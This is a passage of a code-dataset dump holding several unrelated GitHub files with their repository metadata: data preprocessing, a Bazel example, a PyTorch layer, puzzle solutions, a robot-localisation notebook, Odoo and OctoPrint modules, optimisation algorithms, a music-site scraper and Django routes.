filtered dataset #################\nq1_col_name = 'question1'\nq2_col_name = 'question2'\n\n'''\n////////////////////////////\n Uncomment 13-30 for creating filtered.tsv\n////////////////////////////\n'''\ndf = pd.read_csv(INPUT_DATA,index_col=0,sep='\\t')\nprint(df.tail())\nprint('\\nDropping na...\\n')\ndf.dropna(inplace=True)\nprint(df.tail())\n\ndef isAscii(s):\n # print(s)\n try:\n s[q1_col_name].encode('ascii')\n s[q2_col_name].encode('ascii')\n return True\n except UnicodeEncodeError:\n return False\n\ndf2 = df[df.apply(isAscii, axis=1)]\n\nimport string\ndef removePunc(s):\n return str(s).translate(str.maketrans(string.punctuation, ''.join([' ' for _ in string.punctuation]))).lower()\n\ndf2[q1_col_name] = df2[q1_col_name].apply(removePunc)\ndf2[q2_col_name] = df2[q2_col_name].apply(removePunc)\n\nprint(df2.tail())\ndf2.to_csv(FILTERED_DATA, index=False, sep='\\t')\n\n\n\n'''\n////////////////////////////\n Checking stats of filtered\n////////////////////////////\n'''\ndf2 = pd.read_csv(FILTERED_DATA, sep='\\t')\nprint(df2.dtypes)\nprint(df2.head())\n\nprint('\\n***************************')\nprint('Length: ', len(df2))\nprint('Rows with label 0: ', len(df2[df2['is_duplicate'] == 0])/len(df2))\nprint('Rows with label 1: ', len(df2[df2['is_duplicate'] == 1])/len(df2))\nprint('***************************')\n# print(df2.tail())\n\n'''\n\n***************************\nLength: 395545\nRows with label 0: 0.6289853240465687\nRows with label 1: 0.37101467595343135\n***************************\n\n'''","repo_name":"vivekanandapasam/Duplicate-Questions-on-Quora","sub_path":"preproc.py","file_name":"preproc.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70883739112","text":"# buildifier: disable=module-docstring\n# Load the provider of the pre-made settings defined in bazel_skylib.\nload(\"@bazel_skylib//rules:common_settings.bzl\", \"BuildSettingInfo\")\n\n# Define two different transitions that both transition the `color` build setting\n# we defined in the BUILD.\ndef _blue_impl(_, __):\n return {\"//attaching_transitions_to_rules:color\": \"blue\"}\n\nblue_transition = transition(\n implementation = _blue_impl,\n inputs = [],\n outputs = [\"//attaching_transitions_to_rules:color\"],\n)\n\ndef _red_impl(_, __):\n return {\"//attaching_transitions_to_rules:color\": \"red\"}\n\nred_transition = transition(\n implementation = _red_impl,\n inputs = [],\n outputs = [\"//attaching_transitions_to_rules:color\"],\n)\n\n# buildifier: disable=print\ndef _impl(ctx):\n # Access the value of //attaching_transitions_to_rules:color for the target (blue).\n print(\"shirt color: \" + ctx.attr._color[BuildSettingInfo].value)\n\n # Access the value of //attaching_transitions_to_rules:color for the transitioned dep (red).\n # Note that you have to index by [0] here for the transitioned dep and you don't need to\n # do so below - this is because attribute-attached transitions can transition to multiple\n # new configurations so you must specify which one you want.\n print(\"sleeve color: \" + ctx.attr.sleeve[0][BuildSettingInfo].value)\n\n # Access the value of //attaching_transitions_to_rules:color for the non-transitioned dep (blue).\n print(\"back color: \" + ctx.attr.back[BuildSettingInfo].value)\n return []\n\nshirt = rule(\n implementation = _impl,\n # Attaching at rule transitions the configuration of this target and all its dependencies\n # (until it gets overwritten again, for example...)\n cfg = blue_transition,\n attrs = {\n # Attaching to an attribute transitions the configuration of this dependency (and\n # all its dependencies)\n \"sleeve\": attr.label(cfg = red_transition),\n # Here is an attribute with no transition so it will inherit its parent's --//:color\n \"back\": attr.label(),\n # Depend on the build setting so that we can access it in the rule implementation.\n # Use a private attribute (one that is prefixed with \"_\") so that target writers\n # can't override the value.\n \"_color\": attr.label(default = \":color\"),\n # This attribute is required to use starlark transitions. It allows\n # allowlisting usage of this rule. For more information, see\n # https://bazel.build/extending/config#user-defined-transitions\n \"_allowlist_function_transition\": attr.label(\n default = \"@bazel_tools//tools/allowlists/function_transition_allowlist\",\n ),\n },\n)\n\ndef _piece_impl(ctx):\n return ctx.attr._color[BuildSettingInfo]\n\npiece = rule(\n implementation = _piece_impl,\n attrs = {\n # Depend on the build setting so that we can access it in the rule implementation.\n # Use a private attribute (one that is prefixed with \"_\") so that target writers\n # can't override the value.\n \"_color\": attr.label(default = \":color\"),\n },\n)\n","repo_name":"bazelbuild/examples","sub_path":"configurations/attaching_transitions_to_rules/defs.bzl","file_name":"defs.bzl","file_ext":"bzl","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":741,"dataset":"github-code","pt":"72"} +{"seq_id":"19230865618","text":"import torch\nfrom torch.nn import Parameter\nfrom torch_geometric.nn.inits import uniform, ones, glorot, normal\n\n\nclass MGConv(torch.nn.Module):\n \"\"\"\n Args:\n in_channels (int): Size of each input sample.\n out_channels (int): Size of each output sample.\n K (int): Number of scales.\n bias (bool, optional): If set to :obj:`False`, the layer will not learn\n an additive bias. (default: :obj:`True`)\n \"\"\"\n\n def __init__(self, in_channels, out_channels, K, bias=True, number=0):\n super(MGConv, self).__init__()\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.weight = Parameter(torch.Tensor(K, in_channels, out_channels))\n self.number = number\n self.K = K\n\n if bias:\n self.bias = Parameter(torch.Tensor(out_channels))\n else:\n self.register_parameter('bias', None)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n # normal(self.weight, 0, 0.1)\n glorot(self.weight)\n # ones(self.weight)\n if self.bias is not None:\n ones(self.bias)\n\n def forward(self, x, Win):\n for i in range(self.weight.size(0)):\n if i == 0:\n out = torch.matmul(x, self.weight[0])\n else:\n WWW = torch.matmul(torch.t(Win[i-1]), x)\n out += torch.matmul(WWW, self.weight[i])\n\n torch.cuda.empty_cache()\n\n return out\n\n\n def __repr__(self):\n return '{}({}, {}, K={})'.format(self.__class__.__name__,\n self.in_channels, self.out_channels,\n self.weight.size(0))\n","repo_name":"yiqun-wang/MGCN","sub_path":"nn/mgconv.py","file_name":"mgconv.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"72"} +{"seq_id":"19740168786","text":"\"\"\"\nBattleship field validator.\nFrom: https://www.codewars.com/\nLevel: 3 kyu\nPython 3.6.0\n\nDescription:\nWrite a method that takes a field for well-known board game \"Battleship\" as an argument and returns true if it has a valid disposition of ships, false otherwise. Argument is guaranteed to be 10*10 two-dimension array. Elements in the array are numbers, 0 if the cell is free and 1 if occupied by ship.\nBattleship (also Battleships or Sea Battle) is a guessing game for two players. Each player has a 10x10 grid containing several \"ships\" and objective is to destroy enemy's forces by targetting individual cells on his field. The ship occupies one or more cells in the grid. Size and number of ships may differ from version to version. In this kata we will use Soviet/Russian version of the game.\n \nBefore the game begins, players set up the board and place the ships accordingly to the following rules:\n\n•\tThere must be single battleship (size of 4 cells), 2 cruisers (size 3), 3 destroyers (size 2) and 4 submarines (size 1). Any additional ships are not allowed, as well as missing ships.\n•\tEach ship must be a straight line, except for submarines, which are just single cell.\n \n•\tThe ship cannot overlap or be in contact with any other ship, neither by edge nor by corner.\n \nThis is all you need to solve this kata. If you're interested in more information about the game, visit this link.\n\"\"\"\ndef validate_battlefield(field):\n ships = {4: 0, 3: 0, 2: 0, 1: 0}\n correct_ships = {4: 1, 3: 2, 2: 3, 1: 4}\n empty_cell = 0\n empty_row = [empty_cell]*10\n\n field.insert(0, list(empty_row))\n field.insert(len(field), list(empty_row))\n\n for row in field:\n row.insert(0, empty_cell)\n row.append(empty_cell)\n\n processed_cells = []\n for row in range(len(field)):\n processed_cells.append([False] * len(field))\n\n wrong_positions = ((-1, -1), (1, -1), (1, 1), (-1, 1))\n\n for horizont_coord in range(len(field)):\n for vertical_coord in range(len(field)):\n if field[horizont_coord][vertical_coord] == 1:\n\n for position_x, position_y in wrong_positions:\n if field[horizont_coord + position_x][vertical_coord + position_y] == 1:\n return False\n\n if not processed_cells[horizont_coord][vertical_coord]:\n ship_size = 1\n if field[horizont_coord][vertical_coord+ship_size] == 1:\n while field[horizont_coord][vertical_coord+ship_size] == 1:\n processed_cells[horizont_coord][vertical_coord + ship_size] = True\n ship_size += 1\n elif field[horizont_coord+ship_size][vertical_coord] == 1:\n while field[horizont_coord+ship_size][vertical_coord] == 1:\n processed_cells[horizont_coord + ship_size][vertical_coord] = True\n ship_size += 1\n if ship_size in ships and ships[ship_size] < correct_ships[ship_size]:\n ships[ship_size] += 1\n else:\n return False\n if ships != correct_ships:\n return False\n return True\n","repo_name":"goldigor/Python_tasks","sub_path":"battleship_field_validator.py","file_name":"battleship_field_validator.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30849231349","text":"class Solution:\n def solveNQueens(self, n: int) -> \"List[List[str]]\":\n def solve(board,col):\n if len(board)==col:\n board_out=[]\n for i in range(len(board)):\n # board_out.append([])\n board_out.append(''.join(board[i]))\n self.res.append(board_out)\n return\n\n result=False\n for i in range(len(board)):\n if isPossible(board,i,col):\n board[i][col]='Q'\n result=solve(board,col+1) or result\n board[i][col]='.'\n return result\n \n def isPossible(board,row,col):\n for i in range(col):\n if board[row][i]=='Q':\n return False\n \n i,j=row,col\n while i>=0 and j>=0:\n if board[i][j]=='Q':\n return False\n i-=1\n j-=1\n\n i,j=row,col\n while j>=0 and i 0.001:\n \n print(\"Your beliefs appear to not be normalized\")\n return\n \n print(\"Something isn't quite right with your sense function\")\n\ntest_sense()\n\n\n# ## Integration Testing\n# Before we call this \"complete\" we should perform an **integration test**. We've verified that the sense function works on it's own, but does the localizer work overall?\n# \n# Let's perform an integration test. First you you should execute the code in the cell below to prepare the simulation environment.\n\n# In[24]:\n\n\nfrom simulate import Simulation\nimport simulate as sim\nimport helpers\nreload(localizer)\nreload(sim)\nreload(helpers)\n\nR = 'r'\nG = 'g'\ngrid = [\n [R,G,G,G,R,R,R],\n [G,G,R,G,R,G,R],\n [G,R,G,G,G,G,R],\n [R,R,G,R,G,G,G],\n [R,G,R,G,R,R,R],\n [G,R,R,R,G,R,G],\n [R,R,R,G,R,G,G],\n]\n\n# Use small value for blur. This parameter is used to represent\n# the uncertainty in MOTION, not in sensing. We want this test\n# to focus on sensing functionality\nblur = 0.1\np_hit = 100.0\nsimulation = sim.Simulation(grid, blur, p_hit)\n\n\n# In[26]:\n\n\n# Use control+Enter to run this cell many times and observe how \n# the robot's belief that it is in each cell (represented by the\n# size of the corresponding circle) changes as the robot moves.\n# The true position of the robot is given by the red star.\n\n# Run this cell about 15-25 times and observe the results\nfor i in range(1000):\n simulation.run(1)\nsimulation.show_beliefs()\n\n# If everything is working correctly you should see the beliefs\n# converge to a single large circle at the same position as the \n# red star.\n#\n# When you are satisfied that everything is working, continue\n# to the next section\n\n\n# ## Part 3: Identify and Reproduce a Bug\n# Software has bugs. That's okay.\n# \n# A user of your robot called tech support with a complaint\n# \n# > \"So I was using your robot in a square room and everything was fine. Then I tried loading in a map for a rectangular room and it drove around for a couple seconds and then suddenly stopped working. Fix it!\"\n# \n# Now we have to debug. We are going to use a systematic approach.\n# \n# 1. Reproduce the bug\n# 2. Read (and understand) the error message (when one exists)\n# 3. Write a test that triggers the bug.\n# 4. Generate a hypothesis for the cause of the bug.\n# 5. Try a solution. If it fixes the bug, great! If not, go back to step 4.\n\n# ### Step 1: Reproduce the bug\n# The user said that **rectangular environments** seem to be causing the bug. \n# \n# The code below is the same as the code you were working with when you were doing integration testing of your new feature. See if you can modify it to reproduce the bug.\n\n# In[4]:\n\n\nfrom simulate import Simulation\nimport simulate as sim\nimport helpers\nreload(localizer)\nreload(sim)\nreload(helpers)\n\nR = 'r'\nG = 'g'\n\ngrid = [ \n [R,G,G,G,R,R,R],\n [G,G,R,G,R,G,R],\n [G,R,G,G,G,G,R],\n [R,R,G,R,G,G,G],\n]\n\nblur = 0.001\np_hit = 100.0\nsimulation = sim.Simulation(grid, blur, p_hit)\n\n# remember, the user said that the robot would sometimes drive around for a bit...\n# It may take several calls to \"simulation.run\" to actually trigger the bug.\nsimulation.run(1)\nsimulation.show_beliefs()\n\n\n# In[ ]:\n\n\nsimulation.run(1)\n\n\n# ### Step 2: Read and Understand the error message\n# If you triggered the bug, you should see an error message directly above this cell. The end of that message should say:\n# \n# ```\n# IndexError: list index out of range\n# ```\n# \n# And just above that you should see something like\n# \n# ```\n# path/to/your/directory/localizer.pyc in move(dy, dx, beliefs, blurring)\n# 38 new_i = (i + dy ) % width\n# 39 new_j = (j + dx ) % height\n# ---> 40 new_G[int(new_i)][int(new_j)] = cell\n# 41 return blur(new_G, blurring)\n# ```\n# \n# This tells us that line 40 (in the move function) is causing an `IndexError` because \"list index out of range\".\n# \n# If you aren't sure what this means, use Google! \n# \n# Copy and paste `IndexError: list index out of range` into Google! When I do that, I see something like this:\n# \n# ![Search Results](http://i.imgur.com/gleBmBy.png)\n# \n# Browse through the top links (often these will come from stack overflow) and read what people have said about this error until you are satisfied you understand how it's caused.\n\n# ### Step 3: Write a test that reproduces the bug\n# This will help you know when you've fixed it and help you make sure you never reintroduce it in the future. You might have to try many potential solutions, so it will be nice to have a single function to call to confirm whether or not the bug is fixed\n\n# In[5]:\n\n\n# According to the user, sometimes the robot actually does run \"for a while\" \n# - How can you change the code so the robot runs \"for a while\"?\n# - How many times do you need to call simulation.run() to consistently\n# reproduce the bug?\n# Modify the code below so that when the function is called \n# it consistently reproduces the bug.\ndef test_robot_works_in_rectangle_world():\n from simulate import Simulation\n import simulate as sim\n import helpers\n reload(localizer)\n reload(sim)\n reload(helpers)\n\n R = 'r'\n G = 'g'\n\n grid = [ \n [R,G,G,G,R,R,R],\n [G,G,R,G,R,G,R],\n [G,R,G,G,G,G,R],\n [R,R,G,R,G,G,G],\n ]\n\n blur = 0.001\n p_hit = 100.0\n for i in range(1000):\n simulation = sim.Simulation(grid, blur, p_hit)\n simulation.run(1)\n \ntest_robot_works_in_rectangle_world()\n\n\n# ### Step 4: Generate a Hypothesis\n# In order to have a guess about what's causing the problem, it will be helpful to use some Python debuggin tools\n# \n# The `pdb` module (`p`ython `d`e`b`ugger) will be helpful here!\n# \n# #### Setting up the debugger \n# 1. Open `localizer.py` and uncomment the line to the top that says `import pdb`\n# 2. Just before the line of code that is causing the bug `new_G[int(new_i)][int(new_j)] = cell`, add a new line of code that says `pdb.set_trace()`\n# 3. Run your test by calling your test function (run the cell below this one)\n# 4. You should see a text entry box pop up! For now, type `c` into the box and hit enter to **c**ontinue program execution. Keep typing `c` and enter until the bug is triggered again\n\n# In[13]:\n\n\ntest_robot_works_in_rectangle_world()\n\n\n# #### Using the debugger\n# The debugger works by pausing program execution wherever you write `pdb.set_trace()` in your code. You also have access to any variables which are accessible from that point in your code. \n# \n# Try running your test again. This time, when the text entry box shows up, type `new_i` and hit enter. You will see the value of the `new_i` variable show up in the debugger window. Play around with the debugger: find the values of `new_j`, `height`, and `width`. Do they seem reasonable / correct?\n# \n# When you are done playing around, type `c` to continue program execution. Was the bug triggered? Keep playing until you have a guess about what is causing the bug.\n\n# ### Step 5: Write a Fix\n# You have a hypothesis about what's wrong. Now try to fix it. When you're done you should call your test function again. You may want to remove (or comment out) the line you added to `localizer.py` that says `pdb.set_trace()` so your test can run without you having to type `c` into the debugger box.\n\n# In[14]:\n\n\ntest_robot_works_in_rectangle_world()\n\n\n# ## Congratulations!\n# You've implemented your first feature and successfully debugged a problem the robot was having with rectangular environments. Well done.\n","repo_name":"wgcv/Intro-to-Self-Driving-Cars","sub_path":"Project 1 - Two Dimensional Histogram Filter/writeup.py","file_name":"writeup.py","file_ext":"py","file_size_in_byte":13283,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"72"} +{"seq_id":"71897335913","text":"class MyDivisionZeroError(Exception):\n def __init__(self, txt):\n self.txt = txt\n\n\ndiv = lambda x, y: x / y if y != 0 else MyDivisionZeroError('Ошибка дедения на 0!!')\n\nprint(div(1, 0))\n\nprint(div(4, 2))\n","repo_name":"funfounder/python_basics","sub_path":"venv/less08_task02-1.py","file_name":"less08_task02-1.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6726906516","text":"from odoo import models, fields\n\nclass HrApplicant(models.Model):\n _inherit = \"hr.applicant\"\n \n indeed_profile = fields.Char(string=\"Indeed Profile\")\n glints_profile = fields.Char(string=\"Glints Profile\")\n nik = fields.Char(string=\"NIK\")\n gender = fields.Selection([\n ('male', 'Male'),\n ('female', 'Female')\n ],string=\"Gender\")\n dob = fields.Date(string=\"Date of Birth\")\n address = fields.Char(string=\"Address\")\n martial_status = fields.Selection([\n ('single', 'Single'),\n ('married', 'Married'),\n ('divorced', 'Divorced'),\n ], string=\"Martial Status\")\n religion = fields.Selection([\n ('islamic', 'Islam'),\n ('christian', 'Christian'),\n ('hindu', 'Hindu'),\n ('buddha', 'Buddha'),\n ('catholic', 'Catholic'),\n ('khonghucu', 'Khonghucu'),\n ('not say', 'Rather Not Say')\n ], string=\"Religion\")\n last_salary = fields.Integer(string='Last Salary')\n fresh_grad = fields.Boolean(string=\"Fresh Graduate\")\n \n experience_ids = fields.One2many('hr.experience', 'applicant_id' ,string=\"Experience\")\n ","repo_name":"Ikon-ArifN/IKON-Recruitment","sub_path":"custom_addons/ikon_recruitment/models/hr_applicant.py","file_name":"hr_applicant.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13551406839","text":"# coding=utf-8\nfrom __future__ import absolute_import\n\nimport octoprint.plugin\n\nclass OctoDisplayPlugin(octoprint.plugin.StartupPlugin, octoprint.plugin.EventHandlerPlugin):\n def on_after_startup(self):\n self._logger.info(\"Hello World! - OctoDisplay\")\n\n def on_event(self, event, payload):\n #if event == \"PrintStarted\":\n if event == \"Connected\":\n self._logger.info(\"OctoDisplay - Printer Connected\")\n self._logger.info(payload['port'])\n\n\n\n\n\n\n__plugin_implementations__ = [OctoDisplayPlugin()]\n","repo_name":"tapnair/OctoDisplay","sub_path":"octoprint_octodisplay/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23372561864","text":"\"\"\" PL2: single state stochastic algorithms.\"\"\"\n\nimport random\nfrom math import exp, sin, cos, pi\n\n\n# ---- RANDOM SEARCH\ndef random_search(domain,fitness,max_iter):\n \"\"\"\n domain: [...,[xi_min, xi_max]]\n \"\"\"\n best = random_candidate_float(domain)\n cost_best = fitness(best)\n for i in range(max_iter):\n candidate = random_candidate_float(domain)\n cost_candi = fitness(candidate)\n if cost_candi < cost_best:\n best = candidate\n cost_best = cost_candi\n return best\n\n\n# --- HILL-CLIMBING\ndef basic_hc(problem_size,fitness, max_iter):\n \"\"\"Maximization.\"\"\"\n candidate = random_candidate_bin(problem_size)\n cost_candi = fitness(candidate)\n for i in range(max_iter):\n next_neighbor = random_neighbor_bin(candidate)\n cost_next_neighbor = fitness(next_neighbor)\n if cost_next_neighbor >= cost_candi: \n candidate = next_neighbor\n cost_candi = cost_next_neighbor \n return candidate\n\ndef random_restart_hc(problem, fitness, max_iter,restart):\n candidate = random_candidate_bin(problem)\n cost_candidate = fitness(candidate)\n best = candidate\n cost_best = cost_candidate\n for i in range(1,max_iter+1,restart):\n j = 1\n while (j % restart) != 0:\n new_candidate = random_neighbor_bin(candidate)\n cost_new_candidate = fitness(new_candidate)\n if cost_new_candidate >= cost_candidate: \n candidate = new_candidate\n cost_candidate = cost_new_candidate \n j += 1\n if cost_candidate >= cost_best:\n best = candidate\n cost_best = cost_candidate \n candidate = random_candidate_bin(problem)\n cost_candidate = fitness(candidate)\n return best\n\n# -- SIMULATED ANNEALING\ndef simulated_annealing(domain,fitness, sigma, schedule, max_iter):\n best = random_candidate_float(domain)\n cost_best = fitness(best)\n data_best = [cost_best]\n count = 0\n time = schedule(count)\n while (count < max_iter) and (time > 0):\n candidate = random_neighbor_float(domain,best,sigma)\n cost_candi = fitness(candidate)\n if cost_candi < cost_best: \n best = candidate\n cost_best = cost_candi\n else:\n p = random.random()\n app = exp((cost_best - cost_candi)/ float(time))\n if p < app:\n best = candidate\n cost_best = cost_candi\n count += 1\n time = schedule(count)\n data_best.append(cost_best)\n return best#, data_best\n\n\ndef exp_schedule(k=20,decay=0.005, limit=5000):\n def compute(t):\n if t >= limit:\n return 0\n else:\n return k * exp(-decay * t)\n return compute\n\n# -- TABU SEARCH\ndef tabu_search(domain,fitness,sigma,tabu_size, num_tweaks, max_iter):\n best = random_candidate_float(domain)\n cost_best = fitness(best)\n data_best = [cost_best]\n tabu = [best]\n for i in range(max_iter):\n if len(tabu) > tabu_size:\n tabu.pop(0)\n candidate = random_neighbor_float(domain,best, sigma)\n for i in range(num_tweaks):\n new_candidate = random_neighbor_float(domain,best,sigma)\n if (not (similar(new_candidate,tabu, 0.01))) and ((fitness(new_candidate) < fitness(candidate))\\\n or (similar(candidate,tabu,0.01))):\n candidate = new_candidate \n \n cost_candi = fitness(candidate)\n if (not (similar(new_candidate,tabu,0.01))) and cost_candi < cost_best: # minimization\n best = candidate\n cost_best = cost_candi\n tabu.append(candidate) \n data_best.append(cost_best) \n return best#, data_best\n \n \ndef similar(indiv,tabu, delta):\n \"\"\" To detect similar individuals in the tabu list.\"\"\"\n if isinstance(indiv,int):\n return indiv in tabu\n if isinstance(indiv,float):\n for elem in tabu:\n if abs(elem - indiv) < delta:\n return True\n return False\n\n\n# -- ITERATED LOCAL SEARCH\ndef ils(domain,fitness, max_iter, size):\n \"\"\"\n Iterated Local Search: no use of memory!\n domain: [..., [xi_min, xi_max],...]\n fitness: function name\n max_iter: stop condition\n size: number of components to be perturbed\n \"\"\"\n initial = build_initial(domain)\n best = local_search(domain,fitness,initial)\n for i in range(max_iter):\n candidate = perturb(domain,best,size)\n new_best = local_search(domain,fitness,candidate)\n best = acceptance(best, new_best, fitness)\n return best\n\n# Problem specific: for reals\n\ndef build_initial(domain):\n \"\"\"Generates a N-dimentional vector of floats.\"\"\"\n return random_candidate_float(domain)\n \ndef acceptance(current, candidate,fitness):\n \"\"\"Define new local optimum. Minimizing\"\"\"\n cost_current = fitness(current)\n cost_candidate = fitness(candidate)\n if cost_current < cost_candidate: # Minimization\n return current\n else:\n return candidate\n \ndef perturb(domain,individual,size, sigma=1):\n \"\"\"Probabilitic modification of size componentes of a vector.\"\"\"\n pertubed = individual[:]\n indices = random.sample(range(len(individual)),size)\n for indice in indices:\n delta = random.gauss(0,sigma)\n while not (domain[indice][0] <= pertubed[indice] + delta <= domain[indice][1]):\n delta = random.gauss(0,sigma)\n pertubed[indice] += delta \n return pertubed\n \ndef local_search(domain,fitness,indiv,repeat=100):\n \"\"\"simple hill-climbing.\"\"\"\n best = indiv\n for i in range(repeat):\n candidate = perturb(domain,best,1)\n if fitness(candidate) < fitness(best): # minimization\n best = candidate \n return best\n\n# -- Neighborhood\n# --- For local search\ndef random_neighbor_bin(individual):\n \"\"\"Flip one position.\"\"\"\n new_individual = individual[:]\n pos = random.randint(0,len(individual) - 1)\n gene = individual[pos]\n new_gene = (gene + 1) % 2\n new_individual[pos] = new_gene\n return new_individual\n\ndef random_neighbor_float(domain,individual,sigma=1):\n new_individual = individual[:]\n indice = random.randint(0, len(individual)-1)\n delta = random.gauss(0,sigma)\n while not (domain[indice][0] <= new_individual[indice] + delta <= domain[indice][1]):\n delta = random.gauss(0,sigma)\n new_individual[indice] += delta\n return new_individual\n\n# -- Generate individuals\n\ndef random_candidate_bin(size):\n return [random.choice([0,1]) for i in range(size)]\n\ndef random_candidate_float(sp):\n return [random.uniform(sp[i][0],sp[i][1]) for i in range(len(sp))]\n\ndef random_candidate_permut(size):\n return random.shuffle(range(size))\n\n\n# -- Evaluate individuals\ndef onemax(individual):\n \"\"\"Individual = list of zeros and ones.\"\"\"\n return sum(individual)\n\ndef de_jong_f1(individual):\n \"\"\" \n De Jong F1 or the sphere function\n domain: [-5.12, 5.12] for each dimension.\n min = 0 at x = (0,0,...,0)\n \"\"\"\n return sum([ x_i ** 2 for x_i in individual])\n\n\n\n\nif __name__ == '__main__':\n dimension = 3\n search_space = [[-5.12, 5.12] for i in range(dimension)]\n #print(random_search(search_space,de_jong_f1,120))\n #print(basic_hc(20,onemax,120))\n #print(random_restart_hc(20,onemax,200,30))\n #print(exp_schedule()(20))\n #print(simulated_annealing(search_space,de_jong_f1, 1, exp_schedule(), 15000))\n #print(tabu_search(search_space,de_jong_f1, 1,10, 5, 150))\n print(ils(search_space,de_jong_f1, 1500, 1))\n\n\n","repo_name":"valenca/Evolutionary-Computation-Engine","sub_path":"2/pl2.py","file_name":"pl2.py","file_ext":"py","file_size_in_byte":7584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26201392858","text":"import re\nimport requests\nimport os\ndef path_name_id(url_):\n headers={\n \"cookie\":'kg_mid=45c4ed38927807372ce764d929994ef1; kg_dfid=3x7mNe1egszq3tW0DH3ctDDn; kg_dfid_collect=d41d8cd98f00b204e9800998ecf8427e; Hm_lvt_aedee6983d4cfc62f509129360d6bb3d=1679101349; ACK_SERVER_10015={\"list\":[[\"gzlogin-user.kugou.com\"]]}; KuGooRandom=66411679101394945; Hm_lpvt_aedee6983d4cfc62f509129360d6bb3d=1679101433',\n \"referer\": 'https://www.kugou.com/yy/html/special.html',\n \"user-agent\":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41'\n }\n response=requests.get(url=url_,headers=headers).text\n path_=re.findall('<(.*?)> - 歌曲列表',response)[0]+\"\\\\\"\n name_id_=re.findall('[0-9]+)/$', views.TaskDetail.as_view()),\n url(r'^$', views.Index.as_view(), name=\"index\"),\n url(r'^needs/$', views.ListNeed.as_view()),\n url(r'^offers/$', views.ListOffer.as_view()),\n url(r'^users/$', views.CreateUser.as_view()),\n url(r'^needs/filter/$', views.FilterNeed.as_view()),\n url(r'^offers/filter/$', views.FilterOffer.as_view()),\n url(r'^needs/(?P[0-9]+)/$', views.NeedDetail.as_view(template_name = 'front/needdetail.html'), name=\"needdetail\"),\n url(r'^offers/(?P[0-9]+)/$', views.OfferDetail.as_view(template_name = 'front/offerdetail.html'), name=\"offerdetail\"),\n url(r'^needs/(?P[0-9]+)/update/$', views.NeedUpdate.as_view()),\n url(r'^offers/(?P[0-9]+)/update/$', views.OfferUpdate.as_view()),\n url(r'^users/(?P[0-9]+)/$', views.UserDetail.as_view()),\n url(r'^users/(?P[0-9]+)/needs/$', views.ListUserNeed.as_view()),\n url(r'^users/(?P[0-9]+)/offers/$', views.ListUserOffer.as_view()),\n url(r'^needs/(?P\\w+)/$', views.ListNeedCategory.as_view()),\n url(r'^offers/(?P[a-z0-9]+)/$', views.ListOfferCategory.as_view()),\n url(r'^needs/location/(?P[a-z0-9]+)/$', views.ListNeedLocation.as_view()),\n url(r'^offers/location/(?P[a-z0-9]+)/$', views.ListOfferLocation.as_view()),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)","repo_name":"MrSir92/Team-E-Databas","sub_path":"database/webbservice/todoapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38637642055","text":"import telebot\nimport constants\nfrom keyboards import location_keyboard\nfrom candidate import Candidate\n\n\nbot = telebot.TeleBot(constants.TOKEN)\n\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n user_id = message.from_user.id\n first_name = message.from_user.first_name\n bot.send_message(user_id, constants.hello_text, parse_mode='Markdown', reply_markup=location_keyboard)\n\n bot.send_message(57737851, f'\\u2B50\\uFE0F *Новый пользователь* — '\n f'[{first_name}](tg://user?id={user_id}) ({user_id})', parse_mode='Markdown')\n\n\n@bot.message_handler(commands=['help'])\ndef send_program(message):\n bot.send_message(message.from_user.id, constants.help_text, parse_mode='Markdown')\n\n\n@bot.message_handler(commands=['abbreviations'])\ndef send_abbreviations(message):\n bot.send_message(message.from_user.id, constants.abbreviations, parse_mode='Markdown')\n\n\n@bot.message_handler(commands=['memo'])\ndef send_memo(message):\n bot.send_photo(message.from_user.id, constants.memo_photo, caption=constants.memo_text, parse_mode='Markdown')\n\n\n@bot.message_handler(commands=['program'])\ndef send_program(message):\n bot.send_message(message.from_user.id, constants.program, parse_mode='Markdown')\n\n\n@bot.message_handler(content_types=['text'])\ndef text_message(message):\n user_id = message.from_user.id\n text = message.text\n\n bot.send_message(user_id, Candidate.get_my_candidate(address=text), parse_mode='Markdown',\n reply_markup=location_keyboard)\n\n\n@bot.message_handler(content_types=['location'])\ndef location_message(message):\n user_id = message.from_user.id\n location = (message.location.longitude, message.location.latitude)\n\n bot.send_message(user_id, Candidate.get_my_candidate(location=location), parse_mode='Markdown',\n reply_markup=location_keyboard)\n\n\n\nbot.polling()\n","repo_name":"nickavdeev/gorprojectbot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22652395065","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('signup/', views.signup, name='signup'),\n path('signin', views.signin, name='signin'),\n path('logout', views.logout, name='logout'),\n # path('post/', views.post, name='post'),\n # path('create/post', views.create_post, 